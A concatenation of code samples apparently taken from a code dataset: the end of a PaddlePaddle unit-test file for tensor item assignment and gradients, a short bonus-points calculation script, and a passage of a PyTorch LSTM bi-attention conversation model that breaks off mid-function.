create_test_value_fp32(TestSetValueItemSlice2)
create_test_value_fp32(TestSetValueItemSlice3)
create_test_value_fp32(TestSetValueItemSlice4)
def create_test_value_fp64(parent):
class TestValueInt(parent):
def set_value(self):
self.value = 2.0**127 # float32:[-2^128, 2^128)
def set_dtype(self):
self.dtype = "float64"
cls_name = "{0}_{1}".format(parent.__name__, "ValueFp64")
TestValueInt.__name__ = cls_name
globals()[cls_name] = TestValueInt
create_test_value_fp64(TestSetValueItemInt)
create_test_value_fp64(TestSetValueItemSlice)
create_test_value_fp64(TestSetValueItemSlice2)
create_test_value_fp64(TestSetValueItemSlice3)
create_test_value_fp64(TestSetValueItemSlice4)
def create_test_value_bool(parent):
class TestValueInt(parent):
def set_value(self):
self.value = 0
def set_dtype(self):
self.dtype = "bool"
cls_name = "{0}_{1}".format(parent.__name__, "ValueBool")
TestValueInt.__name__ = cls_name
globals()[cls_name] = TestValueInt
create_test_value_bool(TestSetValueItemInt)
create_test_value_bool(TestSetValueItemSlice)
create_test_value_bool(TestSetValueItemSlice2)
create_test_value_bool(TestSetValueItemSlice3)
create_test_value_bool(TestSetValueItemSlice4)
# 2.2 value is numpy.array (int32, int64, float32, float64, bool)
def create_test_value_numpy_int32(parent):
class TestValueInt(parent):
def set_value(self):
self.value = np.array([5])
def set_dtype(self):
self.dtype = "int32"
cls_name = "{0}_{1}".format(parent.__name__, "ValueNumpyInt32")
TestValueInt.__name__ = cls_name
globals()[cls_name] = TestValueInt
create_test_value_numpy_int32(TestSetValueItemInt)
create_test_value_numpy_int32(TestSetValueItemSlice)
create_test_value_numpy_int32(TestSetValueItemSlice2)
create_test_value_numpy_int32(TestSetValueItemSlice3)
create_test_value_numpy_int32(TestSetValueItemSlice4)
def create_test_value_numpy_int64(parent):
class TestValueInt(parent):
def set_value(self):
self.value = np.array([1])
def set_dtype(self):
self.dtype = "int64"
cls_name = "{0}_{1}".format(parent.__name__, "ValueNumpyInt64")
TestValueInt.__name__ = cls_name
globals()[cls_name] = TestValueInt
create_test_value_numpy_int64(TestSetValueItemInt)
create_test_value_numpy_int64(TestSetValueItemSlice)
create_test_value_numpy_int64(TestSetValueItemSlice2)
create_test_value_numpy_int64(TestSetValueItemSlice3)
create_test_value_numpy_int64(TestSetValueItemSlice4)
def create_test_value_numpy_fp32(parent):
class TestValueInt(parent):
def set_value(self):
self.value = np.array([1])
def set_dtype(self):
self.dtype = "float32"
cls_name = "{0}_{1}".format(parent.__name__, "ValueNumpyFp32")
TestValueInt.__name__ = cls_name
globals()[cls_name] = TestValueInt
create_test_value_numpy_fp32(TestSetValueItemInt)
create_test_value_numpy_fp32(TestSetValueItemSlice)
create_test_value_numpy_fp32(TestSetValueItemSlice2)
create_test_value_numpy_fp32(TestSetValueItemSlice3)
create_test_value_numpy_fp32(TestSetValueItemSlice4)
def create_test_value_numpy_fp64(parent):
class TestValueInt(parent):
def set_value(self):
self.value = np.array([2**127]).astype("float64")
def set_dtype(self):
self.dtype = "float64"
cls_name = "{0}_{1}".format(parent.__name__, "ValueNumpyFp64")
TestValueInt.__name__ = cls_name
globals()[cls_name] = TestValueInt
create_test_value_numpy_fp64(TestSetValueItemInt)
create_test_value_numpy_fp64(TestSetValueItemSlice)
create_test_value_numpy_fp64(TestSetValueItemSlice2)
create_test_value_numpy_fp64(TestSetValueItemSlice3)
create_test_value_numpy_fp64(TestSetValueItemSlice4)
def create_test_value_numpy_bool(parent):
class TestValueInt(parent):
def set_value(self):
self.value = np.array([0])
def set_dtype(self):
self.dtype = "bool"
cls_name = "{0}_{1}".format(parent.__name__, "ValueNumpyBool")
TestValueInt.__name__ = cls_name
globals()[cls_name] = TestValueInt
create_test_value_numpy_bool(TestSetValueItemInt)
create_test_value_numpy_bool(TestSetValueItemSlice)
create_test_value_numpy_bool(TestSetValueItemSlice2)
create_test_value_numpy_bool(TestSetValueItemSlice3)
create_test_value_numpy_bool(TestSetValueItemSlice4)
# 2.3 value is a Paddle Tensor (int32, int64, float32, float64, bool)
def create_test_value_tensor_int32(parent):
class TestValueInt(parent):
def set_dtype(self):
self.dtype = "int32"
def _call_setitem(self, x):
value = paddle.full(shape=[1], fill_value=3, dtype=self.dtype)
x[0, 1] = value
def _get_answer(self):
self.data[0, 1] = 3
cls_name = "{0}_{1}".format(parent.__name__, "ValueTensorInt32")
TestValueInt.__name__ = cls_name
globals()[cls_name] = TestValueInt
create_test_value_tensor_int32(TestSetValueItemInt)
create_test_value_tensor_int32(TestSetValueItemSlice)
create_test_value_tensor_int32(TestSetValueItemSlice2)
create_test_value_tensor_int32(TestSetValueItemSlice3)
create_test_value_tensor_int32(TestSetValueItemSlice4)
def create_test_value_tensor_int64(parent):
class TestValueInt(parent):
def set_dtype(self):
self.dtype = "int64"
def _call_setitem(self, x):
value = paddle.full(shape=[1], fill_value=3, dtype=self.dtype)
x[0, 1] = value
def _get_answer(self):
self.data[0, 1] = 3
cls_name = "{0}_{1}".format(parent.__name__, "ValueTensorInt64")
TestValueInt.__name__ = cls_name
globals()[cls_name] = TestValueInt
create_test_value_tensor_int64(TestSetValueItemInt)
create_test_value_tensor_int64(TestSetValueItemSlice)
create_test_value_tensor_int64(TestSetValueItemSlice2)
create_test_value_tensor_int64(TestSetValueItemSlice3)
create_test_value_tensor_int64(TestSetValueItemSlice4)
def create_test_value_tensor_fp32(parent):
class TestValueInt(parent):
def set_dtype(self):
self.dtype = "float32"
def _call_setitem(self, x):
value = paddle.full(shape=[1], fill_value=3, dtype=self.dtype)
x[0, 1] = value
def _get_answer(self):
self.data[0, 1] = 3
cls_name = "{0}_{1}".format(parent.__name__, "ValueTensorFp32")
TestValueInt.__name__ = cls_name
globals()[cls_name] = TestValueInt
create_test_value_tensor_fp32(TestSetValueItemInt)
create_test_value_tensor_fp32(TestSetValueItemSlice)
create_test_value_tensor_fp32(TestSetValueItemSlice2)
create_test_value_tensor_fp32(TestSetValueItemSlice3)
create_test_value_tensor_fp32(TestSetValueItemSlice4)
def create_test_value_tensor_fp64(parent):
class TestValueInt(parent):
def set_dtype(self):
self.dtype = "float64"
def _call_setitem(self, x):
value = paddle.full(shape=[1], fill_value=3, dtype=self.dtype)
x[0, 1] = value
def _get_answer(self):
self.data[0, 1] = 3
cls_name = "{0}_{1}".format(parent.__name__, "ValueTensorFp64")
TestValueInt.__name__ = cls_name
globals()[cls_name] = TestValueInt
create_test_value_tensor_fp64(TestSetValueItemInt)
create_test_value_tensor_fp64(TestSetValueItemSlice)
create_test_value_tensor_fp64(TestSetValueItemSlice2)
create_test_value_tensor_fp64(TestSetValueItemSlice3)
create_test_value_tensor_fp64(TestSetValueItemSlice4)
def create_test_value_tensor_bool(parent):
class TestValueInt(parent):
def set_dtype(self):
self.dtype = "bool"
def _call_setitem(self, x):
value = paddle.full(shape=[1], fill_value=False, dtype=self.dtype)
x[0, 1] = value
def _get_answer(self):
self.data[0, 1] = False
cls_name = "{0}_{1}".format(parent.__name__, "ValueTensorBool")
TestValueInt.__name__ = cls_name
globals()[cls_name] = TestValueInt
create_test_value_tensor_bool(TestSetValueItemInt)
create_test_value_tensor_bool(TestSetValueItemSlice)
create_test_value_tensor_bool(TestSetValueItemSlice2)
create_test_value_tensor_bool(TestSetValueItemSlice3)
create_test_value_tensor_bool(TestSetValueItemSlice4)
# 3. Test different shape of value
class TestSetValueValueShape1(TestSetValueApi):
def set_value(self):
self.value = np.array([3, 4, 5, 6]) # shape is (4,)
def _call_setitem(self, x):
x[0] = self.value
def _get_answer(self):
self.data[0] = self.value
class TestSetValueValueShape2(TestSetValueApi):
def set_value(self):
self.value = np.array([[3, 4, 5, 6]]) # shape is (1,4)
def _call_setitem(self, x):
x[0:1] = self.value
def _get_answer(self):
self.data[0:1] = self.value
class TestSetValueValueShape3(TestSetValueApi):
def set_value(self):
self.value = np.array(
[[1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]]) # shape is (3,4)
def _call_setitem(self, x):
x[0] = self.value
def _get_answer(self):
self.data[0] = self.value
class TestSetValueValueShape4(TestSetValueApi):
def set_value(self):
self.value = np.array(
[[1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]]).astype(
self.dtype) # shape is (3,4)
def _call_setitem(self, x):
x[0] = paddle.assign(self.value) # x is Paddle.Tensor
def _get_answer(self):
self.data[0] = self.value
class TestSetValueValueShape5(TestSetValueApi):
def set_value(self):
self.value = np.array([3, 3, 3]).astype(self.dtype)
def set_shape(self):
self.shape = [3, 4]
def _call_setitem(self, x):
x[:, 0] = paddle.assign(self.value) # x is Paddle.Tensor
def _get_answer(self):
self.data[:, 0] = self.value
# 4. Test error
class TestError(TestSetValueBase):
def _value_type_error(self):
with self.assertRaisesRegexp(
TypeError,
"Only support to assign an integer, float, numpy.ndarray or paddle.Tensor"
):
x = paddle.ones(shape=self.shape, dtype=self.dtype)
value = [1]
x[0] = value
def _dtype_error(self):
with self.assertRaisesRegexp(
TypeError,
"When assign a numpy.ndarray, integer or float to a paddle.Tensor, "
):
y = paddle.ones(shape=self.shape, dtype="float16")
y[0] = 1
def _step_error(self):
with self.assertRaisesRegexp(ValueError, "step can not be 0"):
x = paddle.ones(shape=self.shape, dtype=self.dtype)
x[0:1:0] = self.value
def _ellipsis_error(self):
with self.assertRaisesRegexp(
IndexError, "An index can only have a single ellipsis"):
x = paddle.ones(shape=self.shape, dtype=self.dtype)
x[..., ...] = self.value
with self.assertRaisesRegexp(ValueError, "the start or end is None"):
x = paddle.ones(shape=self.shape, dtype=self.dtype)
one = paddle.ones([1])
x[::one] = self.value
def _bool_list_error(self):
with self.assertRaises(TypeError):
x = paddle.ones(shape=self.shape, dtype=self.dtype)
x[[True, False, 0]] = 0
with self.assertRaises(IndexError):
x = paddle.ones(shape=self.shape, dtype=self.dtype)
x[[True, False], [True, False]] = 0
def _bool_tensor_error(self):
with self.assertRaises(IndexError):
x = paddle.ones(shape=self.shape, dtype=self.dtype)
idx = paddle.assign([True, False, True])
x[idx] = 0
def _broadcast_mismatch(self):
program = paddle.static.Program()
with paddle.static.program_guard(program):
x = paddle.ones(shape=self.shape, dtype=self.dtype)
value = np.array([3, 4, 5, 6, 7])
x[0] = value
exe = paddle.static.Executor(paddle.CPUPlace())
with self.assertRaises(ValueError):
exe.run(program)
def test_error(self):
paddle.enable_static()
with paddle.static.program_guard(self.program):
self._value_type_error()
self._dtype_error()
self._step_error()
self._bool_list_error()
self._bool_tensor_error()
self._broadcast_mismatch()
# 5. Test backward
class Model(paddle.nn.Layer):
def __init__(self):
super(Model, self).__init__()
self.conv = paddle.nn.Conv2D(12, 12, 3)
def forward(self, x, y):
x = self.conv(x)
y = self.conv(y)
var = y.flatten()
x[0, :, 0, 0] = var
loss = paddle.mean(x)
return loss, var, x
class TestBackward(unittest.TestCase):
def test_static(self):
paddle.enable_static()
main_program = paddle.static.Program()
startup_program = paddle.static.Program()
x_np = np.random.random(size=(4, 4)).astype('float32')
y_np = np.random.random(size=(4, 4)).astype('float32')
label_np = np.random.randint(2, size=(4, 1)).astype('int64')
with paddle.static.program_guard(main_program, startup_program):
x = paddle.static.data(name="x", shape=[4, 4], dtype='float32')
y = paddle.static.data(name="y", shape=[4, 4], dtype='float32')
label = paddle.static.data(
name="label", shape=[4, 1], dtype='int64')
z = paddle.add(x, y)
var = y[0, :]
z[0, :] = var
prediction = paddle.static.nn.fc(x=z, size=2, activation='softmax')
cost = paddle.nn.functional.cross_entropy(
input=prediction, label=label)
loss = paddle.mean(cost)
sgd = paddle.optimizer.SGD(learning_rate=0.01)
sgd.minimize(loss)
exe = paddle.static.Executor(paddle.CPUPlace())
exe.run(startup_program)
var_grad, z_grad = exe.run(
main_program,
feed={"x": x_np,
"y": y_np,
"label": label_np},
fetch_list=[var.name + "@GRAD", z.name + "@GRAD"])
self.assertTrue((var_grad == z_grad[0, :]).all())
def test_dynamic(self):
paddle.disable_static()
model = Model()
x = paddle.ones([1, 12, 3, 3]).astype("float32")
y = paddle.ones([1, 12, 3, 3]).astype("float32")
loss, var, x = model(x, y)
loss.backward()
self.assertTrue(var.grad.shape == x.grad[0, :, 0, 0].shape)
#
self.assertTrue((0 == x.grad[0, :, 0, 0]).all())
class TestGradientTruncated(unittest.TestCase):
def test_consistent_with_competitor(self):
paddle.disable_static()
def set_value(t, value):
a = t * t
a[0, 1] = value
y = a * a
return y.sum()
# case 1
array = np.arange(
1, 1 + 2 * 3 * 4, dtype="float32").reshape([1, 2, 1, 3, 1, 4])
value = np.arange(100, 104, dtype="float32").reshape(1, 4)
inps = paddle.to_tensor(array, stop_gradient=False)
value = paddle.to_tensor(value, stop_gradient=False)
loss = set_value(inps, value)
loss.backward()
value_grad = np.array([[600., 606., 612., 618.]])
input_grad = np.array(
[[[[[[4., 32., 108., 256.]], [[500., 864., 1372., 2048.]],
[[2916., 4000., 5324., 6912.]]]],
[[[[0., 0., 0., 0.]], [[0., 0., 0., 0.]], [[0., 0., 0., 0.]]]]]])
self.assertTrue(
np.array_equal(inps.grad.numpy(), input_grad),
msg="The gradient of value should be \n{},\n but reveived {}".
format(input_grad, inps.grad.numpy()))
self.assertTrue(
np.array_equal(value.grad.numpy(), value_grad),
msg="The gradient of input should be \n{},\n but reveived {}".
format(value_grad, value.grad.numpy()))
# case 2
array = np.arange(1, 2 * 3 * 4 + 1, dtype="float32").reshape([4, 2, 3])
value = np.arange(100, 100 + 1, dtype="float32")
inps2 = paddle.to_tensor(array, stop_gradient=False)
value2 = paddle.to_tensor(value, stop_gradient=False)
loss = set_value(inps2, value2)
loss.backward()
value_grad2 = np.array([600.])
input_grad2 = np.array(
[[[4., 32., 108.], [0., 0., 0.]], [[1372., 2048., 2916.],
[4000., 5324., 6912.]],
[[8788., 10976., 13500.], [16384., 19652., 23328.]],
[[27436., 32000., 37044.], [42592., 48668., 55296.]]])
self.assertTrue(
np.array_equal(inps2.grad.numpy(), input_grad2),
msg="The gradient of value should be \n{},\n but reveived {}".
format(input_grad, inps2.grad.numpy()))
self.assertTrue(
np.array_equal(value2.grad.numpy(), value_grad2),
msg="The gradient of input should be \n{},\n but reveived {}".
format(value_grad, value2.grad.numpy()))
# case 3
def set_value3(t, value):
a = t * t
a[0, :, 0, :] = value
y = a * a
return y.sum()
array = np.arange(
1, 1 + 2 * 3 * 4, dtype="float32").reshape([4, 3, 1, 1, 2, 1])
value = np.arange(100, 100 + 2, dtype="float32").reshape(1, 2, 1)
inps = paddle.to_tensor(array, stop_gradient=False)
value = paddle.to_tensor(value, stop_gradient=False)
loss = set_value3(inps, value)
loss.backward()
value_grad = np.array([[[600.], [606.]]])
input_grad = np.array(
[[[[[[0.], [0.]]]], [[[[0.], [0.]]]], [[[[0.], [0.]]]]],
[[[[[1372.], [2048.]]]], [[[[2916.], [4000.]]]],
[[[[5324.], [6912.]]]]], [[[[[8788.], [10976.]]]], [[[[13500.],
[16384.]]]],
[[[[19652.], [23328.]]]]],
[[[[[27436.], [32000.]]]], [[[[37044.], [42592.]]]],
[[[[48668.], [55296.]]]]]])
self.assertTrue(
np.array_equal(inps.grad.numpy(), input_grad),
msg="The gradient of value should be \n{},\n but reveived {}".
format(input_grad, inps.grad.numpy()))
self.assertTrue(
np.array_equal(value.grad.numpy(), value_grad),
msg="The gradient of input should be \n{},\n but reveived {}".
format(value_grad, value.grad.numpy()))
#case 4: step >0
def set_value4(t, value):
a = t * t
a[0, :, 0, ::3] = value
y = a * a
return y.sum()
array = np.arange(
1, 1 + 2 * 3 * 4, dtype="float32").reshape([2, 3, 1, 4, 1])
value = np.arange(100, 100 + 2, dtype="float32").reshape(1, 2, 1)
inps = paddle.to_tensor(array, stop_gradient=False)
value = paddle.to_tensor(value, stop_gradient=False)
loss = set_value4(inps, value)
loss.backward()
value_grad = np.array([[[600.], [606.]]])
input_grad = np.array([[[[[0.], [32.], [108.],
[0.]]], [[[0.], [864.], [1372.], [0.]]],
[[[0.], [4000.], [5324.], [0.]]]],
[[[[8788.], [10976.], [13500.], [16384.]]],
[[[19652.], [23328.], [27436.], [32000.]]],
[[[37044.], [42592.], [48668.], [55296.]]]]])
self.assertTrue(
np.array_equal(inps.grad.numpy(), input_grad),
msg="The gradient of value should be \n{},\n but reveived {}".
format(input_grad, inps.grad.numpy()))
self.assertTrue(
np.array_equal(value.grad.numpy(), value_grad),
msg="The gradient of input should be \n{},\n but reveived {}".
format(value_grad, value.grad.numpy()))
# case 5:a[0].shape==value.shape
def set_value5(t, value):
a = t * t
a[0] = value
y = a * a
return y.sum()
array = np.arange(1, 1 + 2 * 3 * 4, dtype="float32").reshape([2, 3, 4])
value = np.arange(100, 100 + 12, dtype="float32").reshape(3, 4)
inps = paddle.to_tensor(array, stop_gradient=False)
value = paddle.to_tensor(value, stop_gradient=False)
loss = set_value5(inps, value)
loss.backward()
value_grad = np.array([[200., 202., 204., 206.],
[208., 210., 212., 214.],
[216., 218., 220., 222.]])
input_grad = np.array([[[0., 0., 0., 0.], [0., 0., 0., 0.],
[0., 0., 0., 0.]],
[[8788., 10976., 13500., 16384.],
[19652., 23328., 27436., 32000.],
[37044., 42592., 48668., 55296.]]])
self.assertTrue(
np.array_equal(inps.grad.numpy(), input_grad),
msg="The gradient of value should be \n{},\n but reveived {}".
format(input_grad, inps.grad.numpy()))
self.assertTrue(
np.array_equal(value.grad.numpy(), value_grad),
msg="The gradient of input should be \n{},\n but reveived {}".
format(value_grad, value.grad.numpy()))
# case 6: pass stop_gradient from value to x
x = paddle.zeros([8, 8], dtype='float32')
value = paddle.to_tensor([10], dtype='float32', stop_gradient=False)
self.assertTrue(x.stop_gradient)
self.assertTrue(x.is_leaf)
x[0, :] = value
self.assertTrue(~x.stop_gradient)
self.assertTrue(~x.is_leaf)
def test_static_graph(self):
paddle.enable_static()
to_string = lambda x, i, : x + '_' + str(i)
numel = lambda input_shape: reduce(lambda x, y: x * y, input_shape)
def op1(x):
value = paddle.fluid.layers.fill_constant([1], "float32", 1)
# test stop_gradient
value.stop_gradient = True
x.stop_gradient = False
start = paddle.fluid.layers.fill_constant(
[1], "int32", 5, force_cpu=True)
end = paddle.fluid.layers.fill_constant(
[1], "int32", 0, force_cpu=True)
step = paddle.fluid.layers.fill_constant(
[1], "int32", -2, force_cpu=True)
inputs = {
'Input': x,
'ValueTensor': value,
'StartsTensorList': [start, ],
'EndsTensorList': [end, ],
'StepsTensorList': [step, ]
}
helper = LayerHelper("set_value")
y = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="set_value",
inputs=inputs,
outputs={'Out': y},
attrs={'axes': [0]})
return y, value
def op2(x):
value = paddle.fluid.layers.fill_constant([1, 3, 2], "float32", 1)
# test stop_gradient
value.stop_gradient = False
x.stop_gradient = False
attrs = {
'axes': [0],
'starts': [6],
'ends': [0],
'steps': [-4],
'decrease_axes': [],
'none_axes': [],
'dtype': paddle.float32
}
inputs = {'Input': x, 'ValueTensor': value}
helper = LayerHelper("set_value")
y = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="set_value",
inputs=inputs,
outputs={'Out': y},
attrs=attrs)
return y, value
def op3(x):
value = paddle.fluid.layers.fill_constant([1], "float32", 1)
x.stop_gradient = True
value.stop_gradient = False
start = paddle.fluid.layers.fill_constant(
[1], "int32", 0, force_cpu=True)
end = paddle.fluid.layers.fill_constant(
[1], "int32", 5, force_cpu=True)
step = paddle.fluid.layers.fill_constant(
[1], "int32", 3, force_cpu=True)
inputs = {
'Input': x,
'ValueTensor': value,
'StartsTensorList': [start, ],
'EndsTensorList': [end, ],
'StepsTensorList': [step, ]
}
helper = LayerHelper("set_value")
y = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="set_value",
inputs=inputs,
outputs={'Out': y},
attrs={'axes': [0]})
return y, value
def set_value(array, i, op):
name_x = to_string('x', i)
x = paddle.static.data(
name=name_x, shape=array.shape, dtype='float32')
# set_value_op in __get/setitem__ is an inplace operation.
# When `input.stop_gradient = True` and `value.stop_gradient = False`,
# set_value_grad_op will not be run during backward.
y, value = op(x)
y2 = y + 1
loss = paddle.fluid.layers.reduce_sum(y2)
sgd = paddle.optimizer.Adam()
sgd.minimize(loss)
place = paddle.fluid.CPUPlace(
) if not paddle.fluid.core.is_compiled_with_cuda(
) else paddle.fluid.CUDAPlace(0)
prog = paddle.static.default_main_program()
exe = paddle.static.Executor(place)
exe.run(paddle.static.default_startup_program())
fetch_list = []
if not x.stop_gradient:
fetch_list.append(x.grad_name)
if not value.stop_gradient:
fetch_list.append(value.grad_name)
out = exe.run(prog, feed={x.name: array}, fetch_list=fetch_list)
return out
input_shape = [7, 6, 5, 4, 3, 2]
array = np.arange(
0, numel(input_shape), dtype="float32").reshape(input_shape)
for i in range(len(input_shape)):
program = paddle.static.Program()
with paddle.static.program_guard(program):
out1 = set_value(array, i, op1)
self.assertTrue((out1[0][5:0:-2] == 0).all())
if len(array.shape) > 2:
program2 = paddle.static.Program()
with paddle.static.program_guard(program2):
out2 = set_value(array, i, op2)
self.assertTrue((out2[0][6:0:-4] == 0).all())
program3 = paddle.static.Program()
with paddle.static.program_guard(program3):
out3 = set_value(array, i, op3)
self.assertTrue((numel(out1[0][0:5:3].shape) == out3[0]).all())
array = array[0]
class TestSetValueInplaceLeafVar(unittest.TestCase):
def test_inplace_var_become_leaf_var(self):
paddle.disable_static()
a_grad_1, b_grad_1, a_grad_2, b_grad_2 = 0, 1, 2, 3
with paddle.fluid.dygraph.guard():
paddle.seed(100)
a = paddle.rand(shape=[1, 4])
b = paddle.rand(shape=[1, 4])
a.stop_gradient = False
b.stop_gradient = False
c = a / b
c.sum().backward()
a_grad_1 = a.grad.numpy()
b_grad_1 = b.grad.numpy()
with paddle.fluid.dygraph.guard():
paddle.seed(100)
a = paddle.rand(shape=[1, 4])
b = paddle.rand(shape=[1, 4])
a.stop_gradient = False
b.stop_gradient = False
c = a / b
d = paddle.zeros((4, 4))
self.assertTrue(d.stop_gradient)
d[0, :] = c
self.assertFalse(d.stop_gradient)
d[0, :].sum().backward()
a_grad_2 = a.grad.numpy()
b_grad_2 = b.grad.numpy()
self.assertTrue(np.array_equal(a_grad_1, a_grad_2))
self.assertTrue(np.array_equal(b_grad_1, b_grad_2))
paddle.enable_static()
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
1690969 | initial_number = int(input())
bonus_points = 0
if initial_number <= 100:
bonus_points += 5
elif 100 < initial_number <= 1000:
bonus_points = initial_number * 0.2
elif initial_number > 1000:
bonus_points = initial_number * 0.1
additional_bonus = 0
if initial_number % 2 == 0:
additional_bonus += 1
third_bonus = 0
if initial_number % 10 == 5:
third_bonus += 2
all_bonuses = bonus_points + additional_bonus + third_bonus
print(f'{all_bonuses}')
print(f'{initial_number + all_bonuses}')
| StarcoderdataPython |
3384864 | <gh_stars>1-10
import torch
import numpy as np
import torch.nn.functional as F
from torch import nn, optim
import torch.nn.utils.rnn as rnn_utils
class SentLSTM(nn.Module):
def __init__(self, embedding_dim, hidden_dim, batch_size, bi_direction=True):
super(SentLSTM, self).__init__()
self.hidden_dim = hidden_dim
self.bi_direction = bi_direction
self.sent_lstm = nn.LSTM(embedding_dim, hidden_dim, bidirectional=bi_direction)
self.sent_hidden = self.init_hidden(batch_size)
def init_hidden(self, batch_size):
bi = 2 if self.bi_direction else 1
if torch.cuda.is_available(): # run in GPrU
return (torch.randn(bi, batch_size, self.hidden_dim).cuda(),
torch.randn(bi, batch_size, self.hidden_dim).cuda())
else:
return (torch.randn(bi, batch_size, self.hidden_dim),
torch.randn(bi, batch_size, self.hidden_dim))
def forward(self, sentences, sent_lens):
# print sentences.size()
self.sent_hidden = self.init_hidden(len(sentences))
sorted_sent_lens, indices = torch.sort(sent_lens, descending=True)
_, desorted_indices = torch.sort(indices, descending=False)
sorted_sentences = sentences[indices]
packed_sentences = rnn_utils.pack_padded_sequence(sorted_sentences, sorted_sent_lens, batch_first=True)
lstm_out, self.sent_hidden = self.sent_lstm(packed_sentences, self.sent_hidden)
if self.bi_direction:
sent_reps = torch.cat([self.sent_hidden[0][-2], self.sent_hidden[0][-1]], dim=1)
sent_reps = sent_reps[desorted_indices]
else:
sent_reps = self.sent_hidden[0][-1][desorted_indices]
return sent_reps
class LSTMBiA(nn.Module):
def __init__(self, config):
super(LSTMBiA, self).__init__()
self.word_embedding = nn.Embedding(config.vocab_num, config.embedding_dim, padding_idx=0)
if config.embedding_matrix is not None:
self.word_embedding.load_state_dict({'weight': config.embedding_matrix})
self.embedding_dim = config.embedding_dim
self.hidden_dim = config.hidden_dim // 2
self.batch_size = config.batch_size
self.use_gpu = config.use_gpu
self.conv_num_layer = 1
self.model_num_layer = 2
self.bi_direction = True
self.dropout = nn.Dropout(config.dropout)
self.mode = 'train' # or 'test'
self.sent_lstm = SentLSTM(self.embedding_dim, self.hidden_dim, self.batch_size)
self.conv_lstm = nn.LSTM(config.hidden_dim, self.hidden_dim, num_layers=self.conv_num_layer, bidirectional=True)
self.conv_hidden = self.init_hidden(self.batch_size, self.conv_num_layer)
self.similarity = nn.Linear(config.hidden_dim * 3, 1)
self.model_lstm = nn.LSTM(config.hidden_dim, self.hidden_dim, dropout=config.dropout, num_layers=self.model_num_layer, bidirectional=True)
self.model_hidden = self.init_hidden(self.batch_size, self.model_num_layer)
self.layer1 = nn.Linear(config.hidden_dim * 4, config.hidden_dim * 2)
self.layer2 = nn.Linear(config.hidden_dim * 2, config.hidden_dim)
self.out_layer = nn.Linear(config.hidden_dim, 1) # Giving the final prediction
self.final = nn.Sigmoid()
def init_hidden(self, batch_size, num_layer):
bi = 2 if self.bi_direction else 1
if torch.cuda.is_available(): # run in GPU
return (torch.randn(bi * num_layer, batch_size, self.hidden_dim).cuda(),
torch.randn(bi * num_layer, batch_size, self.hidden_dim).cuda())
else:
return (torch.randn(bi * num_layer, batch_size, self.hidden_dim),
torch.randn(bi * num_layer, batch_size, self.hidden_dim))
# def forward(self, target_conv, user_history):
def forward(self, convs, conv_lens, conv_turn_lens, users, user_lens, user_turn_lens):
self.conv_hidden = self.init_hidden(len(convs), self.conv_num_layer)
self.model_hidden = self.init_hidden(len(convs), self.model_num_layer)
conv_reps = []
for c in range(len(convs)):
# turn_num = 0
# sent_lens = []
# for turn in conv:
# if turn[1] == 0:
# break
# turn_num += 1
# zero_num = torch.sum(turn[1:] == 0) # find if there are 0s for padding
# sent_lens.append(len(turn) - 1 - zero_num)
# turn_infos = conv[:turn_num, :1].float()
if torch.cuda.is_available() and self.use_gpu: # run in GPU
# turn_infos = turn_infos.cuda()
sent_reps = self.sent_lstm(self.word_embedding(convs[c, :conv_lens[c]].cuda()), torch.LongTensor(conv_turn_lens[c][:conv_lens[c]]).cuda())
else:
sent_reps = self.sent_lstm(self.word_embedding(convs[c, :conv_lens[c]]), torch.LongTensor(conv_turn_lens[c][:conv_lens[c]]))
conv_reps.append(sent_reps)
sorted_conv_turn_nums, sorted_conv_indices = torch.sort(torch.LongTensor(conv_lens), descending=True)
_, desorted_conv_indices = torch.sort(sorted_conv_indices, descending=False)
sorted_conv_reps = []
for index in sorted_conv_indices:
sorted_conv_reps.append(conv_reps[index])
paded_convs = rnn_utils.pad_sequence(sorted_conv_reps)
packed_convs = rnn_utils.pack_padded_sequence(paded_convs, sorted_conv_turn_nums)
conv_out, self.conv_hidden = self.conv_lstm(packed_convs, self.conv_hidden)
conv_out = rnn_utils.pad_packed_sequence(conv_out, batch_first=True)[0]
conv_out = conv_out[desorted_conv_indices]
if self.mode == 'test':
user_history = []
for u in range(len(users)):
current_user = [users[u, i] for i in range(user_lens[u])]
current_user.append(convs[u, conv_lens[u]-1])
current_user = rnn_utils.pad_sequence(current_user, batch_first=True)
user_history.append(current_user)
user_lens[u] += 1
else:
user_history = users
sorted_his_lens, sorted_his_indices = torch.sort(torch.LongTensor(user_lens), descending=True)
_, desorted_his_indices = torch.sort(sorted_his_indices, descending=False)
sorted_user_history = []
for index in sorted_his_indices:
sorted_user_history.append(user_history[index])
his_out = []
his_num = 0
for one_his in sorted_user_history:
sent_lens = []
for sent in one_his[:sorted_his_lens[his_num]]:
zero_num = torch.sum(sent == 0) # find if there are 0s for padding
sent_lens.append(len(sent) - zero_num)
if torch.cuda.is_available(): # run in GPU
his_out.append(self.sent_lstm(self.word_embedding(one_his[:sorted_his_lens[his_num]].cuda()), torch.LongTensor(sent_lens).cuda()))
else:
his_out.append(self.sent_lstm(self.word_embedding(one_his[:sorted_his_lens[his_num]]), torch.LongTensor(sent_lens)))
his_num += 1
his_out = rnn_utils.pad_sequence(his_out, batch_first=True)
his_out = his_out[desorted_his_indices]
batch_size = conv_out.size(0)
conv_sent_len = conv_out.size(1)
his_sent_len = his_out.size(1)
hidden_dim = conv_out.size(-1)
conv_rep = conv_out.repeat(1, 1, his_sent_len).view(batch_size, conv_sent_len * his_sent_len, -1)
his_rep = his_out.repeat(1, conv_sent_len, 1)
sim_matrix = torch.cat([conv_rep, his_rep, conv_rep * his_rep], -1).view(batch_size, conv_sent_len, his_sent_len, -1)
sim_matrix = self.similarity(sim_matrix)
sim_matrix = sim_matrix.squeeze(-1)
# print sim_matrix
atten_c2h = F.softmax(sim_matrix, dim=-1)
atten_c2h = atten_c2h.unsqueeze(-1).repeat(1, 1, 1, hidden_dim)
atten_c2h = atten_c2h * his_out.unsqueeze(1)
atten_c2h = atten_c2h.sum(2)
# print F.softmax(sim_matrix, dim=-1)
# print F.softmax(sim_matrix.max(2)[0], dim=-1)
atten_h2c = F.softmax(sim_matrix.max(2)[0], dim=-1)
atten_h2c = atten_h2c.unsqueeze(-1) * conv_out
atten_h2c = atten_h2c.sum(1)
atten_h2c = atten_h2c.unsqueeze(1).repeat(1, conv_sent_len, 1)
